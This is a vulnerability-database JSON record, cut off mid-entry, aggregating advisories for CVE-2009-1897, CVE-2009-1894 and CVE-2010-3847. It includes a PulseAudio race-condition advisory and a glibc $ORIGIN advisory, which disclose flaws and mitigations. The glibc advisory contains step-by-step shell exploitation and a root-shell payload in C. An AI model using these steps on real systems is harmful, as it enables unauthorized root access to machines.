The tun_chr_poll function in drivers/net/tun.c in the tun subsystem in the Linux kernel 2.6.30 and 2.6.30.1, when the -fno-delete-null-pointer-checks gcc option is omitted, allows local users to gain privileges via vectors involving a NULL pointer dereference and an mmap of /dev/net/tun, a different vulnerability than CVE-2009-1894.
{"ubuntucve": [{"lastseen": "2023-08-03T05:18:46", "description": "The tun_chr_poll function in drivers/net/tun.c in the tun subsystem in the\nLinux kernel 2.6.30 and 2.6.30.1, when the -fno-delete-null-pointer-checks\ngcc option is omitted, allows local users to gain privileges via vectors\ninvolving a NULL pointer dereference and an mmap of /dev/net/tun, a\ndifferent vulnerability than CVE-2009-1894.", "cvss3": {}, "published": "2009-07-20T00:00:00", "type": "ubuntucve", "title": "CVE-2009-1897", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894", "CVE-2009-1897"], "modified": "2009-07-20T00:00:00", "id": "UB:CVE-2009-1897", "href": "https://ubuntu.com/security/CVE-2009-1897", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-03T05:19:13", "description": "Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users\nto gain privileges via vectors involving creation of a hard link, related\nto the application setting LD_BIND_NOW to 1, and then calling execv on the\ntarget of the /proc/self/exe symlink.", "cvss3": {}, "published": "2009-07-17T00:00:00", "type": "ubuntucve", "title": "CVE-2009-1894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-17T00:00:00", "id": "UB:CVE-2009-1894", "href": "https://ubuntu.com/security/CVE-2009-1894", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:33", "description": "Error in NULL pointer dereference error handling.", "cvss3": {}, "published": "2009-07-27T00:00:00", "type": "securityvulns", "title": "Linux kernel privilege escalation", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897"], "modified": "2009-07-27T00:00:00", "id": "SECURITYVULNS:VULN:10084", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10084", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:10:23", "description": "Race condition on temporary files creation allow symlink attack.", "cvss3": {}, "published": "2009-07-18T00:00:00", "type": "securityvulns", "title": "PulseAudio race conditions", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-18T00:00:00", "id": "SECURITYVULNS:VULN:10079", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10079", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:31", "description": "------------------------------------------------------------------------\r\nPulseAudio local race condition privilege escalation vulnerability\r\n------------------------------------------------------------------------\r\nYorick Koster, June 2009\r\n\r\n------------------------------------------------------------------------\r\nAbstract\r\n------------------------------------------------------------------------\r\n\r\nThe PulseAudio binary is affected by a local race condition. If the \r\nbinary is installed as SUID root, it is possible to exploit this \r\nvulnerability to gain root privileges. This attack requires that a local\r\nattacker can create hard links on the same hard disk partition on which\r\nPulseAudio is installed (i.e. /usr/bin and /tmp reside on the same \r\npartition).\r\n\r\n------------------------------------------------------------------------\r\nSee also\r\n------------------------------------------------------------------------\r\n\r\n- CVE-2009-1894 [2]\r\n- GLSA 200907-13 [3] PulseAudio: Local privilege escalation\r\n- USN-804-1 [4] PulseAudio vulnerability\r\n\r\n------------------------------------------------------------------------\r\nTested version\r\n------------------------------------------------------------------------\r\n\r\nThis issue was successfully verified on the following Linux \r\ndistributions:\r\n\r\n- Ubuntu 9.04 running PulseAudio version 0.9.14\r\n- Debian 5.0 running PulseAudio version 0.9.10\r\n- Mandriva Linux 2009 Spring running PulseAudio version 0.9.15\r\n\r\n------------------------------------------------------------------------\r\nFix\r\n------------------------------------------------------------------------\r\n\r\nA patch for PulseAudio was released that addresses this issue. This \r\npatch can be obtained from the following location:\r\n\r\nhttp://git.0pointer.de/?p=pulseaudio.git;a=commit;h=84200b423ebfa7e2dad9b1b65f64eac7bf3d2114\r\n\r\nAs a temporary workaround, remove the SUID bit from the PulseAudio \r\nbinary.\r\n\r\n$ chmod u-s `which pulseaudio`\r\n\r\n------------------------------------------------------------------------\r\nIntroduction\r\n------------------------------------------------------------------------\r\n\r\nPulseAudio [5] is a sound server for POSIX and Win32 systems. A sound \r\nserver is basically a proxy for your sound applications. It allows you \r\nto do advanced operations on your sound data as it passes between your \r\napplication and your hardware.\r\n\r\nOn some systems, the PulseAudio binary is installed SUID root to enable \r\nreal-time scheduling. If set, the daemon will drop root privileges \r\nimmediately on startup, however it will retain the CAP_NICE capability \r\n(on systems that support it), but only if the calling user is a member \r\nof the pulse-rt group. For all other users all capabilities are dropped \r\nimmediately.\r\n\r\n------------------------------------------------------------------------\r\nRace condition\r\n------------------------------------------------------------------------\r\n\r\nIf the PulseAudio binary is started on Linux systems, it checks if the \r\nLD_BIND_NOW environment variable is set. If this is not the case, \r\nPulseAudio will set the variable and it will reload itself. It tries to \r\ndetermine its path name by looking at the /proc/self/exe symbolic link. \r\nThis symbolic link will point to the full path name of the current \r\nprocess.\r\n\r\nint main(int argc, char *argv[]) {\r\n[...]\r\n#if defined(__linux__) && defined(__OPTIMIZE__)\r\n /*\r\n Disable lazy relocations to make usage of external libraries\r\n more deterministic for our RT threads. We abuse __OPTIMIZE__ as\r\n a check whether we are a debug build or not.\r\n */\r\n \r\n if (!getenv("LD_BIND_NOW")) {\r\n char *rp;\r\n \r\n /* We have to execute ourselves, because the libc caches the\r\n * value of $LD_BIND_NOW on initialization. */\r\n \r\n pa_set_env("LD_BIND_NOW", "1");\r\n pa_assert_se(rp = pa_readlink("/proc/self/exe"));\r\n pa_assert_se(execv(rp, argv) == 0);\r\n }\r\n#endif\r\n\r\nNormally, /proc/self/exe will point to something like \r\n/usr/bin/pulseaudio. However by using hard links, it is possible to \r\ncause /proc/self/exe to point to a different location.\r\n\r\n$ cd /tmp\r\n$ ls -la /proc/self/exe\r\nlrwxrwxrwx 1 yorick yorick 0 2009-06-09 16:31 /proc/self/exe -> \r\n/bin/ls\r\n$ ln `which ls` ls\r\n$ ./ls -la /proc/self/exe\r\nlrwxrwxrwx 1 yorick yorick 0 2009-06-09 16:31 /proc/self/exe -> \r\n/tmp/ls\r\n\r\nIn addition, if a hard link is created, the SUID bit is preserved.\r\n\r\n$ ln `which pulseaudio` pulseaudio\r\n$ ls -la pulseaudio \r\n-rwsr-xr-x 2 root root 71616 2009-04-09 02:12 pulseaudio\r\n\r\nA race condition exists in the reload mechanism of PulseAudio. An \r\nattacker can exploit this issue by creating a hard link pointing to the \r\nPulseAudio binary. After this it can execute this binary through the \r\nhard link. At this moment /proc/sef/exe will point to the hard link. \r\nBefore PulseAudio is restarted, the attacker can replace the hard link \r\nwith a different (executable) file or (symbolic) link. If PulseAudio is \r\nrestarted, it will use a path name that at this moment points to a \r\ndifferent file, for example a command shell. Root privileges are not \r\ndropped when PulseAudio is reloading, thus allowing a local attacker to \r\ngain root privileges.\r\n\r\nPlease note, this attack is only possible if the attacker can create \r\nhard links on the same hard disk partition on which PulseAudio is \r\ninstalled (i.e. /usr/bin and /tmp reside on the same partition).\r\n\r\n------------------------------------------------------------------------\r\nProof of concept\r\n------------------------------------------------------------------------\r\n\r\nThe following proof of concept can be used to exploit this issue. The \r\nproof of concept tries to exploit this issue by creating hard links in \r\nthe /tmp directory.\r\n\r\npa_race [6]\r\n\r\n$ ./pa_race\r\nI: caps.c: Limited capabilities successfully to CAP_SYS_NICE.\r\nI: caps.c: Dropping root privileges.\r\nI: caps.c: Limited capabilities successfully to CAP_SYS_NICE.\r\nN: main.c: Called SUID root and real-time and/or high-priority \r\nscheduling was requested in the configuration. However, we lack the \r\nnecessary privileges:\r\nN: main.c: We are not in group 'pulse-rt', PolicyKit refuse to\r\n grant us the requested privileges and we have no increase \r\nRLIMIT_NICE/RLIMIT_RTPRIO resource limits.\r\nN: main.c: For enabling real-time/high-priority scheduling please \r\nacquire the appropriate PolicyKit privileges, or become a member of \r\n'pulse-rt', or increase the RLIMIT_NICE/RLIMIT_RTPRIO resource\r\n limits for this user.\r\nE: pid.c: Daemon already running.\r\nE: main.c: pa_pid_file_create() failed.\r\n[...]\r\nuid=0(root) gid=0(root) groups=4(adm), 20(dialout), 24(cdrom), \r\n25(floppy), 29(audio), 30(dip), 44(video), 46(plugdev), 107(fuse), \r\n109(lpadmin), 115(admin), 1000(yorick)\r\n# \r\n\r\n------------------------------------------------------------------------\r\nReferences\r\n------------------------------------------------------------------------\r\n\r\n[1] http://www.akitasecurity.nl/advisory.php?id=AK20090602\r\n[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1894\r\n[3] http://www.gentoo.org/security/en/glsa/glsa-200907-13.xml\r\n[4] http://www.ubuntu.com/usn/usn-804-1\r\n[5] http://pulseaudio.org/\r\n[6] http://www.akitasecurity.nl/advisory/AK20090602/pa_race\r\n\r\n------------------------------------------------------------------------\r\n-- \r\n------------------------------------------------------------------------\r\nAkita Software Security (Kvk 37144957)\r\nhttp://www.akitasecurity.nl/\r\n------------------------------------------------------------------------\r\nKey fingerprint = 5FC0 F50C 8B3A 4A61 7A1F 2BFF 5482 D26E D890 5A65\r\nhttp://keyserver.pgp.com/vkd/DownloadKey.event?keyid=0x5482D26ED8905A65", "cvss3": {}, "published": "2009-07-18T00:00:00", "type": "securityvulns", "title": "PulseAudio local race condition privilege escalation vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-18T00:00:00", "id": "SECURITYVULNS:DOC:22183", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22183", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:31", "description": "rPath Security Advisory: 2009-0111-1\r\nPublished: 2009-07-24\r\nProducts:\r\n rPath Appliance Platform Linux Service 1\r\n rPath Appliance Platform Linux Service 2\r\n rPath Linux 2\r\n\r\nRating: Severe\r\nExposure Level Classification:\r\n Remote Deterministic Denial of Service\r\nUpdated Versions:\r\n kernel=conary.rpath.com@rpl:2/2.6.29.6-0.2-1\r\n kernel=rap.rpath.com@rpath:linux-1/2.6.29.6-2-1\r\n\r\nrPath Issue Tracking System:\r\n https://issues.rpath.com/browse/RPL-3048\r\n https://issues.rpath.com/browse/RPL-3065\r\n https://issues.rpath.com/browse/RPL-3078\r\n https://issues.rpath.com/browse/RPL-3080\r\n https://issues.rpath.com/browse/RPL-3088\r\n https://issues.rpath.com/browse/RPL-3090\r\n\r\nReferences:\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1385\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1633\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1389\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1630\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1895\r\n\r\nDescription:\r\n Previous versions of the Linux kernel are vulnerable to multiple\r\n security issues, including both man-in-the-middle/hostile server\r\n attacks and remote denial of service attacks that are specific\r\n to certain hardware configurations; these vulnerabilities are\r\n resolved in this version. Additionally, although no rPath kernel is\r\n vulnerable to the widely-publicized local root exploit identified\r\n as CVE-2009-1897, a patch has been applied to guard against other\r\n similar but as yet unknown vulnerabilities.\r\n\r\nhttp://wiki.rpath.com/Advisories:rPSA-2009-0111\r\n\r\nCopyright 2009 rPath, Inc.\r\nThis file is distributed under the terms of the MIT License.\r\nA copy is available at http://www.rpath.com/permanent/mit-license.html\r\n", "cvss3": {}, "published": "2009-07-27T00:00:00", "type": "securityvulns", "title": "rPSA-2009-0111-1 kernel", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-1385", "CVE-2009-1389", "CVE-2009-1633", "CVE-2009-1897", "CVE-2009-1630"], "modified": "2009-07-27T00:00:00", "id": "SECURITYVULNS:DOC:22217", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22217", "sourceData": "", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "description": "The GNU C library dynamic linker expands $ORIGIN in setuid library search path\r\n------------------------------------------------------------------------------\r\n\r\nGruezi, This is CVE-2010-3847.\r\n\r\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\r\ndynamically linked programs. ld.so operates in two security modes, a permissive\r\nmode that allows a high degree of control over the load operation, and a secure\r\nmode (libc_enable_secure) intended to prevent users from interfering with the\r\nloading of privileged executables.\r\n\r\n$ORIGIN is an ELF substitution sequence representing the location of the\r\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\r\nexecutables to specify a search path for libraries that is relative to their\r\nlocation, to simplify packaging without spamming the standard search paths with\r\nsingle-use libraries.\r\n\r\nNote that despite the confusing naming convention, $ORIGIN is specified in a\r\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\r\nenvironment (developers would normally use the -rpath ld parameter, or\r\n-Wl,-rpath,$ORIGIN via the compiler driver).\r\n\r\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\r\nbinaries,\r\n\r\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\r\n\r\n"For security, the dynamic linker does not allow use of $ORIGIN substitution\r\n sequences for set-user and set-group ID programs. For such sequences that\r\n appear within strings specified by DT_RUNPATH dynamic array entries, the\r\n specific search path containing the $ORIGIN sequence is ignored (though other\r\n search paths in the same string are processed). $ORIGIN sequences within a\r\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\r\n errors. The same restrictions may be applied to processes that have more than\r\n minimal privileges on systems with installed extended security mechanisms."\r\n\r\nHowever, glibc ignores this recommendation. The attack the ELF designers were\r\nlikely concerned about is users creating hardlinks to suid executables in\r\ndirectories they control and then executing them, thus controlling the\r\nexpansion of $ORIGIN.\r\n\r\nIt is tough to form a thorough complaint about this glibc behaviour however,\r\nas any developer who believes they're smart enough to safely create suid\r\nprograms should be smart enough to understand the implications of $ORIGIN\r\nand hard links on load behaviour. The glibc maintainers are some of the\r\nsmartest guys in free software, and well known for having a "no hand-holding"\r\nstance on various issues, so I suspect they wanted a better argument than this\r\nfor modifying the behaviour (I pointed it out a few years ago, but there was\r\nlittle interest).\r\n\r\nHowever, I have now discovered a way to exploit this. The origin expansion\r\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\r\nto prevent it from working, it is insufficient.\r\n\r\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\r\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\r\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\r\n\r\nThe codepath that triggers this expansion is\r\n\r\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\r\n\r\n(in the code below DST is dynamic string token)\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\r\n\r\n 741 /* Expand DSTs. */\r\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 743 if (__builtin_expect (cnt == 0, 1))\r\n 744 llp_tmp = strdupa (llp);\r\n 745 else\r\n 746 {\r\n 747 /* Determine the length of the substituted string. */\r\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 749\r\n 750 /* Allocate the necessary memory. */\r\n 751 llp_tmp = (char *) alloca (total + 1);\r\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 753 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\r\n\r\n 253 if (__builtin_expect (*name == '$', 0))\r\n 254 {\r\n 255 const char *repl = NULL;\r\n 256 size_t len;\r\n 257\r\n 258 ++name;\r\n 259 if ((len = is_dst (start, name, "ORIGIN", is_path,\r\n 260 INTUSE(__libc_enable_secure))) != 0)\r\n 261 {\r\n ...\r\n 267 repl = l->l_origin;\r\n 268 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\r\n\r\n\r\n 202 if (__builtin_expect (secure, 0)\r\n 203 && ((name[len] != '\0' && (!is_path || name[len] != ':'))\r\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\r\n 205 return 0;\r\n 206\r\n 207 return len;\r\n 208 }\r\n\r\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\r\nThis makes little sense, and does not appear to be useful even if there were\r\nno security impact. This was most likely the result of an attempt to re-use the\r\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\r\nintroducing this error.\r\n\r\nPerhaps surprisingly, this error is exploitable.\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAt least the following versions have been tested\r\n\r\n 2.12.1, FC13\r\n 2.5, RHEL5 / CentOS5\r\n\r\nOther versions are probably affected, possibly via different vectors. I'm aware\r\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\r\ndo not know if it's possible to avoid this.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nIt is possible to exploit this flaw to execute arbitrary code as root.\r\n\r\nPlease note, this is a low impact vulnerability that is only of interest to\r\nsecurity professionals and system administrators. End users do not need\r\nto be concerned.\r\n\r\nExploitation would look like the following.\r\n\r\n# Create a directory in /tmp we can control.\r\n$ mkdir /tmp/exploit\r\n\r\n# Link to an suid binary, thus changing the definition of $ORIGIN.\r\n$ ln /bin/ping /tmp/exploit/target\r\n\r\n# Open a file descriptor to the target binary (note: some users are surprised\r\n# to learn exec can be used to manipulate the redirections of the current\r\n# shell if a command is not specified. This is what is happening below).\r\n$ exec 3< /tmp/exploit/target\r\n\r\n# This descriptor should now be accessible via /proc.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\r\n\r\n# Remove the directory previously created\r\n$ rm -rf /tmp/exploit/\r\n\r\n# The /proc link should still exist, but now will be marked deleted.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target\r\n(deleted)\r\n\r\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to\r\ndlopen().\r\n$ cat > payload.c\r\nvoid __attribute__((constructor)) init()\r\n{\r\n setuid(0);\r\n system("/bin/bash");\r\n}\r\n^D\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n$ ls -l /tmp/exploit\r\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\r\n\r\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\r\n$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3\r\nsh-4.1# whoami\r\nroot\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIt is a good idea to prevent users from creating files on filesystems mounted\r\nwithout nosuid. The following interesting solution for administrators who\r\ncannot modify their partitioning scheme was suggested to me by Rob Holland\r\n(@robholland):\r\n\r\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\r\nfor example:\r\n\r\n# mount -o bind /tmp /tmp\r\n# mount -o remount,bind,nosuid /tmp /tmp\r\n\r\nBe aware of race conditions at boot via crond/atd/etc, and users with\r\nreferences to existing directories (man lsof), but this may be an acceptable\r\nworkaround until a patch is ready for deployment.\r\n\r\n(Of course you need to do this everywhere untrusted users can make links to\r\nsuid/sgid binaries. find(1) is your friend).\r\n\r\nIf someone wants to create an init script that would automate this at boot for\r\ntheir distribution, I'm sure it would be appreciated by other administrators.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMajor distributions should be releasing updated glibc packages shortly.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\r\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\r\nand all my other elite friends and colleagues.\r\n\r\nAdditional greetz to the openwall guys who saw this problem coming years ago.\r\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\r\ntheir insight into systems security.\r\n\r\nhttp://www.openwall.com/owl/\r\n\r\n-------------------\r\nNotes\r\n-----------------------\r\n\r\nThere are several known techniques to exploit dynamic loader bugs for suid\r\nbinaries, the fexecve() technique listed in the Consequences section above is a\r\nmodern technique, making use of relatively recent Linux kernel features (it was\r\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\r\nbelieve Gabriel Campana came up with the same solution independently).\r\n\r\nThe classic UNIX technique is a little less elegant, but has the advantage that\r\nread access is not required for the target binary. It is rather common for\r\nadministrators to remove read access from suid binaries in order to make\r\nattackers work a little harder, so I will document it here for reference.\r\n\r\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\r\nbytes capacity on Linux, see the section on "Pipe Capacity" in pipe(7) from the\r\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\r\nanything written to stderr will block, so you simply execve() and then make the\r\nloader print some error message, allowing you to reliably win any race\r\ncondition.\r\n\r\nLD_DEBUG has always been a a good candidate for getting error messages on\r\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\r\nsome minor complaints about information leaks, but it can still be used with a\r\nslight modification (I first learned of this technique from a bugtraq posting\r\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\r\n\r\nThe exploit flow for this alternative attack is a little more complicated, but\r\nwe can still use the shell to do it (this session is from an FC13 system,\r\noutput cleaned up for clarity).\r\n\r\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\r\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN"\r\n/tmp/exploit/target 2>&1) | (sleep 1h; cat) &\r\n[1] 26926\r\n\r\n# Now ld.so is blocked on write() in the background trying to say "invalid\r\n# debug option", so we are free to manipulate the filesystem.\r\n$ rm -rf /tmp/exploit/\r\n\r\n# Put exploit payload in place.\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n\r\n# Clear the pipe by killing sleep, letting cat drain the contents. This will\r\n# unblock the target, allowing it to continue.\r\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\r\n-bash: line 99: 26929 Terminated sleep 1h\r\n\r\n# And now we can take control of a root shell :-)\r\n$ fg\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\r\nwhile the loader is trying to map lots of memory, you have a good chance of\r\nwinning any race. I previously found an integer overflow in this feature and\r\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\r\nmaintainers disagreed and just fixed the overflow.\r\n\r\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\r\n\r\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\r\nnext big loader bug is going to be, it's just not safe to let attackers have\r\nthat much control over the execution environment of privileged programs.\r\n\r\nFinally, some notes on ELF security for newcomers. The following common\r\nconditions are usually exploitable:\r\n\r\n - An empty DT_RPATH, i.e. -Wl,-rpath,""\r\n This is a surprisingly common build error, due to variable expansion\r\n failing during the build process.\r\n - A relative, rather than absolute DT_RPATH.\r\n For example, -Wl,-rpath,"lib/foo".\r\n\r\nI'll leave it as an exercise for the interested reader to explain why. Remember\r\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\r\nfor their dependencies, and so on.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\r\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux\r\nProgrammer's Manual.\r\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux\r\nProgrammer's Manual.\r\n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0.\r\n- Partitioning schemes and security,\r\nhttp://my.opera.com/taviso/blog/show.dml/654574\r\n- CVE-2009-1894 description,\r\nhttp://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\r\n\r\nYou should subscribe to Linux Weekly News and help support their high standard\r\nof security journalism.\r\n\r\nhttp://lwn.net/\r\n\r\nI have a twitter account where I occasionally comment on security topics.\r\n\r\nhttp://twitter.com/taviso\r\n\r\nex$$\r\n\r\n-- \r\n-------------------------------------\r\ntaviso@cmpxchg8b.com | pgp encrypted mail preferred\r\n-------------------------------------------------------", "cvss3": {}, "published": "2010-10-24T00:00:00", "type": "securityvulns", "title": "The GNU C library dynamic linker expands $ORIGIN in setuid library search path", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-24T00:00:00", "id": "SECURITYVULNS:DOC:24977", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24977", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-05-19T14:17:51", "description": "Update to linux kernel 2.6.27.29:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.26 http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.27 http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.28 http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.29 Fixes security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407 Adds\n-fno-delete- null-pointer-checks gcc compile flag to protect against issues similar to CVE-2009-1897.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-08-05T00:00:00", "type": "nessus", "title": "Fedora 10 : kernel-2.6.27.29-170.2.78.fc10 (2009-8264)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:10"], "id": "FEDORA_2009-8264.NASL", "href": "https://www.tenable.com/plugins/nessus/40482", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8264.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40482);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_bugtraq_id(35647, 35850, 35851);\n script_xref(name:\"FEDORA\", value:\"2009-8264\");\n\n script_name(english:\"Fedora 10 : kernel-2.6.27.29-170.2.78.fc10 (2009-8264)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to linux kernel 2.6.27.29:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.26\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.27\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.28\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.29 Fixes\nsecurity bugs: CVE-2009-1895 CVE-2009-2406 